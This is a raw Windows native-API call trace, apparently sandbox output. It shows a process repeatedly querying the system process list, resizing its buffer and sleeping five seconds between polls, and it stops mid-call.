NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.188] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.196] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.197] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.199] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.213] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.218] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.228] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.228] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.231] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.247] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.258] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.259] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.262] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.275] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.278] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.279] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.289] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.293] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.293] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.319] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.320] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.323] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.337] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.337] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.337] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.340] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.340] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.352] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.352] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.353] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.353] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.355] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.356] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.369] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.371] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.384] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.384] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.387] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.402] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.403] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.418] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.431] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.434] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.446] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.450] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.465] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.482] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.495] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.508] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.512] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.536] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.542] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.559] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.570] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.574] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.586] NtAllocateVirtualMemory (in: 